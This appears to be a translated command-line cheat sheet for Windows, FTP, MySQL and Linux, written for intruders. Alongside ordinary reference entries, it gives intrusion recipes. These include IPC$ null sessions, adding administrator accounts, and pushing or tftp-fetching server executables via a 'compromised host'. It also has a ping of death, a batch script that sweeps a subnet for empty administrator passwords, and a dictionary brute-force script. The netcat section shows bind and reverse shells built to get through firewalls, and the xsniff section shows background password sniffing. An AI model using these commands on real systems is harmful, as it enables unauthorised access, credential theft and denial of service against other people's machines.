About CMD application

net use \\ip\ipc$ "" /user:""  Establish an IPC$ null session

net use \\ip\ipc$ "password" /user:"username"  Establish a non-null IPC$ session

net use h: \\ip\c$ "password" /user:"username"  Log in directly and map the remote C: drive to the local drive H:

net use h: \\ip\c$  After logging in, map the remote C: drive to the local drive H:

net use \\ip\ipc$ /del  Delete the IPC$ connection

net use h: /del  Delete the mapping of the remote drive to local H:

net user username password /add  Create a user

net user guest /active:yes  Activate the guest user

net user  List the users on the system

net user account-name  Show the attributes of an account

net localgroup administrators username /add  Add the "user" to the administrators group so that it has administrator privileges; note: administrators is plural

net start  See which services are running

net start service-name  Start a service (e.g. net start telnet, net start schedule)

net stop service-name  Stop a service

net time \\target-ip  View the remote host's time

net time \\target-ip /set  Synchronize the local computer's time with the "target IP" host's time; adding the /yes parameter suppresses the confirmation prompt

net view  View what is shared on the local LAN

net view \\ip  View what the remote host shares on the LAN

net config  Show the system's network settings

net logoff  Disconnect the system from the network

net logoff  Disconnect a connected share

net pause service-name  Pause a service

net send ip "text message"  Send a message to the other party

net ver  Show the type of network connection and information about the network connections in use on the LAN

net share  View the shares enabled locally

net share ipc$  Enable the ipc$ share

net share ipc$ /del  Delete the ipc$ share

net share c$ /del  Delete the C$ share

net user guest 12345  After logging in as guest, change the guest password to 12345

net password password  Change the system login password

netstat -a  See which ports are open; commonly used as netstat -an

netstat -n  See the network connections by port; commonly used as netstat -an

netstat -v  See the work in progress

netstat -p protocol-name  View the usage of a given protocol, e.g. netstat -p tcp/ip views the usage of the tcp/ip protocol

netstat -s  View the usage of all protocols in use

nbtstat -A ip  If one of the remote host's ports 136 to 139 is open, shows the username of the most recent login on the remote host (the entry before <03> is the username); note: the -A parameter must be uppercase

tracert -parameter ip (or computer name)  Trace the route taken by packets; the "-w number" parameter sets the timeout interval

ping ip (or domain name)  Send data to the remote host, 32 bytes by default; parameters: "-l [space] packet size"; "-n number of packets to send"; "-t" means ping continuously

ping -t -l 65550 ip  Ping of death (sending packets larger than 64K continuously is the ping of death)

ipconfig (winipcfg)  Used on Windows NT and XP (Windows 95/98) to view the local IP address; ipconfig can be used with the "/all" parameter to display all configuration information

tlist -t  Display processes as a tree (one of the system's additional tools, not installed by default; found in the Support\Tools folder of the installation media)

kill -F process-name  The -F parameter forcibly ends a process (one of the system's additional tools, not installed by default; found in the Support\Tools folder of the installation media)

del /F filename  The /F parameter deletes read-only files; /AR, /AH, /AS, /AA delete read-only, hidden, system and archive files respectively, and /A-R, /A-H, /A-S, /A-A delete files other than read-only, hidden, system and archive files. For example, "DEL /AR *.*" deletes all read-only files in the current directory, and "DEL /A-S *.*" deletes all files in the current directory except system files

Two:

del /S /Q directory or rmdir /S /Q directory  /S deletes the directory and all subdirectories and files under it; the /Q parameter suppresses the system's confirmation of the deletion and deletes directly (both commands work the same way)

move drive:\path\filename destination-path\new-filename  Move a file; the /y parameter suppresses the confirmation prompt when a file with the same name already exists in the destination directory, and the file is overwritten directly

fc one.txt two.txt > 3st.txt  Compare the two files and write the differences to 3st.txt; ">" and ">>" are redirection operators

at id-number  Starts a registered scheduled task

at /delete  Stops all scheduled tasks; with /yes, stops all scheduled tasks without confirmation

at id-number /delete  Stops a registered scheduled task

at  View all scheduled tasks

at \\ip time program-name (or a command) /r  Run a program on the remote host at the given time and restart the computer

finger username@host  See which users have recently logged in

telnet ip port  Remote login to a server; the default port is 23

open ip  Connect to the IP (used after the telnet client has been started)

telnet  Typing telnet on its own on the local machine enters the local telnet client

copy path\filename1 path\filename2 /y  Copy file 1 to the specified directory as file 2; the /y parameter suppresses the confirmation prompt for overwriting an existing file

copy c:\srv.exe \\ip\admin$  Copy the local c:\srv.exe to the remote host's admin$ share

copy 1st.jpg/b+2st.txt/a 3st.jpg  Hide the contents of 2st.txt inside 1st.jpg to generate the new file 3st.jpg; note: 2st.txt should begin with three empty lines; parameters: /b means a binary file, /a means an ASCII file

copy \\ip\admin$\srv.exe c:\ or copy \\ip\admin$\*.* c:\  Copy srv.exe (or all files) from the remote host's admin$ share to the local C:

xcopy source-file-or-directory-tree destination\directory-name  Copy files and directory trees; the /Y parameter suppresses the prompt to overwrite files of the same name

tftp -i own-IP (when using a compromised host as a jump point, this is that host's IP) get server.exe c:\server.exe  After logging in, download server.exe from "IP" to the target host as c:\server.exe. Parameters: -i means binary transfer mode (for example for exe files); without -i, ASCII mode is used (for text files)

tftp -i remote-IP put c:\server.exe  After logging in, upload the local c:\server.exe to the host

ftp ip port  Used to upload files to a server or perform file operations; the default port is 21. bin means binary transfer (for executables); the default is ASCII format (for text files)

route print  Displays the IP routing table, which mainly shows the Network Address, Netmask, Gateway Address and Interface

arp  View and manipulate the ARP cache. ARP is address resolution, responsible for resolving an IP address into a physical MAC address; arp -a shows the full information

start program-name-or-command /max or /min  Open a new window and maximize (minimize) a program or command

mem  View CPU usage

attrib filename (directory-name)  View the attributes of a file (directory)

attrib filename -A -R -S -H or +A +R +S +H  Removes (adds) the archive, read-only, system and hidden attributes of a file; + adds an attribute

dir  View files; parameters: /Q shows which user each file and directory belongs to; /T:C shows when the file was created, /T:A when it was last accessed, /T:W when it was last modified

date /t, time /t  With this parameter, i.e. "DATE /T" or "TIME /T", only the current date and time are shown, without prompting for a new date and time

set variable-name=value  Set an environment variable

set  Show all current environment variables

set p (or another character)  Show all current environment variables starting with the character p (or the given character)

pause  Pauses the batch program and displays: Press any key to continue...

if Performs conditional processing in a batch program (see if commands and variables for more information)

goto tag Directs cmd.exe to the line with the tag in the batch program (the tag must be on a separate line and begin with a colon, e.g., the ":start" tag)

call path\batch filename Calls another batch program from a batch program (see call /? for more information).

for Executes a specific command for each file in a group (see for commands and variables for more information)

echo on or off Turns echo on or off; use echo alone without arguments to display the current echo settings

echo message Displays a message on the screen

echo message >> pass.txt  Appends the "message" to the pass.txt file

findstr "Hello" aa.txt Looks for the string hello in the aa.txt file

find filename Looks for a file

title Title name Changes the title name of the CMD window

color color-value  Sets the foreground and background color of the cmd console; 0=black, 1=blue, 2=green, 3=light green, 4=red, 5=purple, 6=yellow, 7=white, 8=gray, 9=pale blue, A=pale green, B=pale light green, C=pale red, D=pale violet, E=pale yellow, F=bright white

prompt name  Changes the command prompt displayed by cmd.exe (e.g. changes C:\, D:\ uniformly to EntSky\)

Three:

ver Display version information in a DOS window

winver Bring up a window to display version information (memory size, system version, patch version, computer name)

format drive /FS:type  Format the disk; types: FAT, FAT32, NTFS; example: format D: /FS:NTFS

md directory-name  Create a directory

replace source-file directory-of-the-file-to-replace  Replace a file

ren original-filename new-filename  Rename a file

tree  Displays the directory in a tree structure; the /f parameter also lists the file names in the folders

type filename Displays the contents of a text file

more filename Displays the output file screen-by-screen

doskey command-to-lock=character  Lock a command; doskey command-to-unlock=  Unlock it. doskey edits the command line, recalls Win2K commands and creates macros. E.g. lock the dir command: doskey dir=entsky (doskey dir=dir cannot be used); unlock: doskey dir=

taskmgr Calls up Task Manager

chkdsk /F D:  Checks disk D: and displays a status report; the /F parameter fixes errors on the disk

tlntadmn  Telnet service administration; type tlntadmn, select 3, then select 8, to change the telnet service's default port 23 to any other port

exit  Exit cmd.exe or the current batch script; with the /B parameter it exits the current batch script instead of cmd.exe

path path\executable-filename  Set a search path for executable files

cmd  Launches a Win2K command interpreter window. Parameters: /E:OFF and /E:ON disable or enable command extensions; see cmd /?

regedit /s registry filename Import the registry; parameter /S refers to quiet mode import without any prompts;

regedit /e registry filename Export the registry

cacls filename parameters  Display or modify file access control lists (ACLs); for NTFS volumes. Parameters: /D username denies access to a user; /P username:perm replaces the access rights of the specified user; /G username:perm grants access rights to the specified user; perm can be N (none), R (read), W (write), C (change/write), F (full control). Example: cacls D:\test.txt /D pub denies user pub access to d:\test.txt

cacls filename View a list of user permissions to access the file

REM text content Add a comment to the batch file

netsh View or change the local network configuration

Four:

IIS service commands:

iisreset /reboot  Restart the Win2K computer (a message indicating that the system will reboot appears)

iisreset /start or /stop  Starts (stops) all Internet services

iisreset /restart  Stops and then restarts all Internet services

iisreset /status  Displays the status of all Internet services

iisreset /enable or /disable  Enables (disables) restarting of Internet services on the local system

iisreset /rebootonerror  Reboots the system if an error occurs when starting, stopping or restarting Internet services

iisreset /noforce  Does not forcibly terminate the Internet services if they cannot be stopped

iisreset /timeout val  Timeout (in seconds) to wait for the Internet services to stop; if /rebootonerror is specified, the computer reboots when the timeout is reached. The default values are 20 seconds for restart, 60 seconds for stop and 0 seconds for reboot

FTP commands: (detailed descriptions follow)

The command line format for ftp is:

ftp -v -d -i -n -g [hostname]

-v Displays all response messages from the remote server.

-d Enables debugging mode.

-n Suppresses automatic login, i.e. does not use .netrc files.

-g Disables filename globbing.

help [command] or ? [command] View command description

bye or quit Terminates the host FTP process and exits the FTP management mode.

pwd Lists the current remote host directory

put or send local-filename [filename uploaded to host] Transfers a local file to a remote host

get or recv [remote-host-filename] [filename downloaded locally] Transfers a file from a remote host to the local host

mget [remote-files] Receives a batch of files from the remote host to the local host

mput local-files Transfers a batch of files from the local host to the remote host

dir or ls [remote-directory] [local-file] Lists the files in the directory of the current remote host. If there is a local file, the result is written to the local file

ascii Sets the file to be transferred in ASCII (default)

bin or image Sets the file to be transferred in binary

bell Alarms for each file transfer

cdup Returns to the previous directory

close Ends the ftp session with the remote server (corresponds to open)

open host[port] Establishes a connection to the specified ftp server, can specify the port to connect to

delete Deletes files from the remote host

mdelete [remote-files] Deletes a batch of files

mkdir directory-name Creates a directory in the remote host

rename [from] [to] Changes the filename in the remote host

rmdir directory-name Deletes a directory in the remote host

status Displays the current status of FTP

system Displays the remote host's system type

user user-name [password] [account] Re-login to the remote host with a different username

open host [port] Re-establish a new connection

prompt Interactive Prompt Mode

macdef Defines macro commands

lcd Changes the working directory of the current local host; by default, it goes to the current user's HOME directory

chmod Changes file permissions on the remote host

case When ON, filenames copied to the local machine with the MGET command are converted to lowercase letters

cd remote-dir into the remote host directory

cdup into the parent directory of the remote host directory

! Executes a shell command on the local machine and then returns to the ftp environment, e.g. !ls *.zip

Five:

MYSQL commands:

mysql -h host-address -u username -p password  Connect to MySQL; on a fresh MySQL installation the superuser root has no password.

(Example: mysql -h110.110.110.110 -uroot -p123456

Note: no space is needed between -u and root, and likewise for the other options)

exit  Exit MySQL

mysqladmin -u username -p old-password password new-password  Change a password

grant select on database.* to username@login-host identified by "password";  Add a new user. (Note: unlike the commands above, the following commands end with a semicolon as the terminator because they are executed inside the MySQL environment.)

show databases; Displays a list of databases. There are only two databases at the beginning: mysql and test. the mysql library is very important because it contains system information about MYSQL, and it's what we use to change passwords and add new users.

use mysql;

show tables; displays the tables in the library

describe table name; displays the structure of the table

create database database-name; creates a database

use library name;

create table table name (list of fields); builds the table

drop database database-name; drop table table-name; delete a database or table

delete from table; empty table rows

select * from table; show table rows

mysqldump --opt school > school.bbb  Back up a database (command executed in the mysql\bin directory from a DOS prompt). Note: this backs up the database school to the file school.bbb; school.bbb is a text file and the filename is arbitrary; open it and you will have a new discovery.

New commands for Win2003 (practical part):

shutdown /parameters  Shut down or reboot the local or a remote host.

Parameter description: /S shuts down the host, /R reboots the host, /T number sets the delay in seconds (range 0 to 180), /A cancels a pending shutdown, /M \\IP specifies the remote host.

Example: shutdown /r /t 0  Immediately reboots the local host (no delay)

taskkill /parameters process-name or process-pid  Terminates one or more tasks or processes.

Parameter description: /PID the pid of the process to terminate (use the tasklist command to obtain the pid of each process), /IM the image name of the process to terminate, /F forcibly terminates the process, /T terminates the specified process and any child processes it started.

tasklist  Displays the processes and services currently running on the local or a remote host together with their process identifiers (PIDs).

Parameter description: /M lists the dll files loaded by the current process, /SVC shows the services corresponding to each process, without parameters, only the current process is listed

Six:

Linux basic commands (case sensitive):

uname  Show version information (the same as ver on Win2K)

dir  Shows the files in the current directory; ls -al shows files including hidden ones (the same as Win2K's dir)

pwd  Shows the current directory location

cd ..  Returns to the parent directory; note the space between cd and ..; cd / returns to the root directory.

cat filename View the contents of the file

cat >abc.txt Write the contents of abc.txt.

more filename Display a text file in a page-by-page format.

cp copy a file

mv move a file

rm filename  deletes a file; rm -r directory-name deletes a directory and its subdirectories

mkdir directory-name  creates a directory

rmdir  deletes an empty subdirectory

chmod  Sets access permissions on a file or directory

grep  Finds strings in a file

diff  Compares the contents of two files

find  Searches for files

date  Current date and time

who  Shows who is currently working on the same machine as you, and when and from where they logged in

w Find out the details of the person currently on the machine

whoami See your account name

groups See someone's Groups

passwd Change password

history See the commands you've given

ps Show the status of a process

kill Stop a process

gcc Hackers usually use it to compile files written in C

su Privilege switch to the specified user

telnet IP  Telnet connection to the remote host (the same as Win2K); when the bash$ prompt appears, the connection has succeeded.

ftp ftp connect to a server (same as Win2K)

Attachment: batch commands and variables

1: for commands and variables  Basic format:

FOR /parameter %variable IN (set) DO command [command_parameters]  %variable: specifies a single-letter replaceable parameter, e.g. %i; inside a batch file the variable is written %%i; an environment variable is referenced as %i%; variables are case sensitive (%i is not equal to %I).

A batch file can handle the variables %0-%9, ten in all, of which %0 defaults to the batch filename, %1 to the first value entered when the batch is invoked, and likewise %2-%9 to the 2nd-9th values entered. Example: in net use \\ip\ipc$ pass /user:user, ip is %1, pass is %2 and user is %3

(set): specifies a file or a group of values; wildcards may be used, e.g. (D:\user.txt) and (1 1 254) or (1 -1 254). In "(1 1 254)" the first "1" is the starting value, the second "1" the increment and "254" the end value, i.e. from 1 to 254; "(1 -1 254)" means from 254 down to 1.

command: specifies the command to execute for each item, e.g. the net use command; to execute more than one command, separate them with &

command_parameters: specifies parameters or command-line switches for the particular command

IN (set): means take the values from (set); DO command: means execute the command

Parameters: /L means use incremental form ((set) is a numeric range); /F means keep reading values from a file until it is exhausted ((set) is a file, e.g. (d:\pass.txt)).

Use examples:

@echo off

echo Usage: test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "Command completed successfully" >>test.txt

Save as test.bat. Description: tries in turn to establish an IPC$ connection with an empty administrator password to the 254 IPs of a specified class C segment, and if successful saves the IP in test.txt.

/L means incremental form (i.e. from 1 to 254 or 254 to 1); the first three octets of the IP, *.*.*, are the batch's default %1; %%G is the variable (the last octet of the IP); & separates the two commands echo and net use; | pipes the result of creating the ipc$ connection into find, which checks whether a "Command completed successfully" message is present; %1.%%G is the full IP address; (1 1 254) gives the starting value, the increment and the end value.

@echo off

echo Usage: ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200

Save as ok.bat. Explanation: after an IP address is entered, the dictionary file d:\pass.dic is used to brute-force the passwords of the users listed in d:\user.dic until the file is exhausted. %%i is the username; %1 is the IP address entered (the default first parameter).

Seven:

2: if commands and variables  Basic format:

IF [not] errorlevel number command  If the program returned an exit code equal to or greater than the specified number when it finished running, the condition is "true".

Example: IF errorlevel 0 means that if the value returned by the program is 0, execute the command that follows; IF not errorlevel 1 means that if the value returned when the program finished is not 1, execute the command that follows.

0 means found and executed successfully (true); 1 means not found or not executed (false).

IF [not] string1==string2 command  If the specified text strings match (that is, string1 equals string2), execute the command that follows.

Example: "if "%2%"=="4" goto start" means: if the second variable is 4, execute the following commands (note: reference the variable as %variable-name% and enclose it in " ")

IF [not] exist filename command  If the file exists, execute the command that follows.

Example: "if not exist nc.exe goto end" means: if no nc.exe file is found, jump to the ":end" label.

IF [not] errorlevel number command else command, or IF [not] string1==string2 command else command, or IF [not] exist filename command else command  The else clause means: when the preceding condition does not hold, execute the command after else. Note: else must be on the same line as if to be valid. When a del command is used, the whole del command must be enclosed in parentheses, because del must otherwise be on a line of its own; the parentheses make it a separate group. Example: "if exist test.txt. (del test.txt.) else echo test.txt. missing"; note the "." in the command
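As an added illustration of the for, if errorlevel and if exist syntax explained above (example code written for this page, not part of the original post), a batch file that audits which of the administrative shares listed earlier (C$, ADMIN$, IPC$) are enabled on the local machine. It assumes cmd.exe on an NT-family Windows with command extensions enabled and is run from an administrator prompt.

```batch
@echo off
rem Added example, not from the original post: audits the default
rem administrative shares and records which ones are currently enabled.
rem Assumes cmd.exe on an NT-family system with command extensions on.
setlocal
set FOUND=0
set LOGFILE=%TEMP%\shares.txt

rem if ... else on one line; the parentheses group the del command
if exist "%LOGFILE%" (del "%LOGFILE%") else echo creating %LOGFILE%

rem %%S is the loop variable: double %% because this is a batch file,
rem not the interactive prompt. "net share NAME" only succeeds when
rem NAME is actually shared, so its exit code drives the if below.
for %%S in (C$ ADMIN$ IPC$) do (
    net share %%S >nul 2>&1
    rem "errorlevel 1" is true for any exit code of 1 or higher,
    rem so "not errorlevel 1" is true only for exit code 0
    if not errorlevel 1 (
        echo %%S is enabled >>"%LOGFILE%"
        set FOUND=1
    ) else (
        echo %%S is not shared >>"%LOGFILE%"
    )
)

rem %FOUND% is read after the loop, so it holds the final value
if "%FOUND%"=="1" (
    echo At least one administrative share is enabled; see %LOGFILE%
) else (
    echo No administrative shares are enabled
)
type "%LOGFILE%"
endlocal
```

Reading %FOUND% inside the loop would show the value from before the loop started, which is why the summary is printed after the loop ends.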

(ii) system external commands (all require downloading the relevant tools):

1. Swiss Army Knife: nc.exe

Parameter description:

-h View help information

-d background mode

-e prog  Program redirection: executes the program once a connection is made [dangerous]

-i secs Delayed intervals

-l Listening mode, for inbound connections

-L  Listening mode; keeps listening even after the connection is closed, until Ctrl+C

-n  Use IP addresses, not domain names

-o file  Log a hex dump of the transmitted data to the file

-p [space] port  Local port number

-r random Local and remote ports

-t Use Telnet interaction

-u UDP mode

-v Detailed output, use -vv for more detail

-w Numeric timeout delay intervals

-z  Turns input and output off (used for scanning hosts)

Basic usage:

nc -nvv 192.168.0.1 80  Connects to port 80 on host 192.168.0.1

nc -l -p 80  Opens local TCP port 80 and listens

nc -nvv -w2 -z 192.168.0.1 80-1024  Scans ports 80-1024 on host 192.168.0.1

nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe  Binds the remote host's cmd shell to TCP port 5354 on the remote host

nc -t -e c:\winnt\system32\cmd.exe 192.168.0.2 5354  Binds the remote host's cmd shell and reverse-connects it to port 5354 on 192.168.0.2

Advanced Usage:

nc -L -p 80  As a honeypot 1: opens and keeps listening on port 80 until Ctrl+C

nc -L -p 80 > c:\log.txt  As a honeypot 2: opens and keeps listening on port 80 until Ctrl+C, and writes the output to c:\log.txt

nc -L -p 80 < c:\honeyport.txt  As a honeypot 3-1: opens and keeps listening on port 80 until Ctrl+C, and sends the contents of c:\honeyport.txt into the pipe; can also be used to transfer files

type.exe c:\honeyport.txt | nc -L -p 80  As a honeypot 3-2: opens and keeps listening on port 80 until Ctrl+C, and sends the contents of c:\honeyport.txt into the pipe; can also be used to transfer files

On the local machine: nc -l -p local-port

On the remote host: nc -e cmd.exe local-IP -p local-port  *Win2K

nc -e /bin/sh local-IP -p local-port  *Linux/Unix; a reverse connection that gets through the remote host's firewall

On the local side: nc -d -l -p local-port < path-and-name-of-the-file-to-transfer

On the remote host: nc -vv local-IP local-port > path-and-name-of-the-file-to-store  Transfers a file to the remote host

Remarks:

| Pipeline commands

< or >  Redirection operators. "<" example: tlntadmn < test.txt means feed the contents of test.txt to the tlntadmn command as its input

@  Executes the command after @ without displaying it (runs silently); example: @dir c:\winnt >> d:\log.txt means run dir silently and store the result in d:\log.txt

Difference between ">" and ">>": ">" means overwrite; ">>" means append to.

For example, run @dir c:\winnt >> d:\log.txt twice and @dir c:\winnt > d:\log.txt twice and compare: with >> the second run's results are added after the first run's; with > only one run's results remain, because the second run overwrote the first.

Eight:

2. Host scanning tool: xscan.exe

Basic format

xscan -host <start-IP>[-<end-IP>] <detection-items> [other options]  Scans all hosts in the "start IP to end IP" segment

xscan -file <host-list-filename> <detection-items> [other options]  Scans all hosts listed in the "host list filename"

Detect item

-active Detects if the host is alive

-os Detects the type of remote OS (via NETBIOS and SNMP protocols)

-port Detects port status of common services

-ftp Detects FTP weak password

-pub Detects anonymous user write access to FTP service

-pop3 Detects POP3-Server weak password

-smtp Detects SMTP-Server vulnerability

-sql Detects weak SQL-Server password

-smb Detects weak NT-Server password

-iis Detects IIS encoding/decoding vulnerability

-cgi Detects CGI vulnerability

-nasl Loads Nessus attack scripts

-all Detect all of the above

Other Options

-i adapter-number  Sets the network adapter; the adapter number can be obtained with the "-l" option

-l Displays all the network adapters

-v Shows the progress of the scanning in detail

-p Skips hosts that do not respond

-o Skips hosts that do not detect open vulnerabilities

-t threads,hosts  Specifies the maximum number of concurrent threads and concurrent hosts; defaults to 100,10

-log Filename Specifies the scan report filename (suffix: TXT or HTML format file)

Usage Examples

xscan -host 192.168.1.1-192.168.255.255 -all -active -p  Detects all vulnerabilities on hosts in the 192.168.1.1-192.168.255.255 segment, skipping unresponsive hosts

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o  Detects the standard port status and NT weak-password users of hosts in the 192.168.1.1-192.168.255.255 segment, with a maximum of 150 concurrent threads, skipping hosts with no open ports detected

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o  Detects the standard port status and CGI vulnerabilities of all hosts listed in the "hostlist.txt" file, with a maximum of 200 concurrent threads and at most 5 hosts at a time, showing detailed progress

3. Sniffer: xsniff.exe

-udp Outputs UDP datagrams

-icmp Outputs ICMP datagrams

-pass Filters password information

-hide Runs in the background

-host Resolves the hostname

-addr IP address Filters IP addresses

-port Port Filters the ports

-log filename Saves output to file

-asc Outputs in ASCII

-hex Outputs in hexadecimal

Usage Examples

xsniff.exe -pass -hide -log pass.log  Runs in the background, sniffs passwords and saves them in the pass.log file

xsniff.exe -tcp -udp -asc -addr 192.168.1.1 Sniffs 192.168.1.1 and filters tcp and udp information and outputs it in ASCII format

4. Terminal Services password cracker: tscrack.exe

Parameter Description

-h Display help

-v Display version information

-s Print the decryption capability on screen

-b Sound when a password is wrong

-t Send multiple connections at the same time (multiple)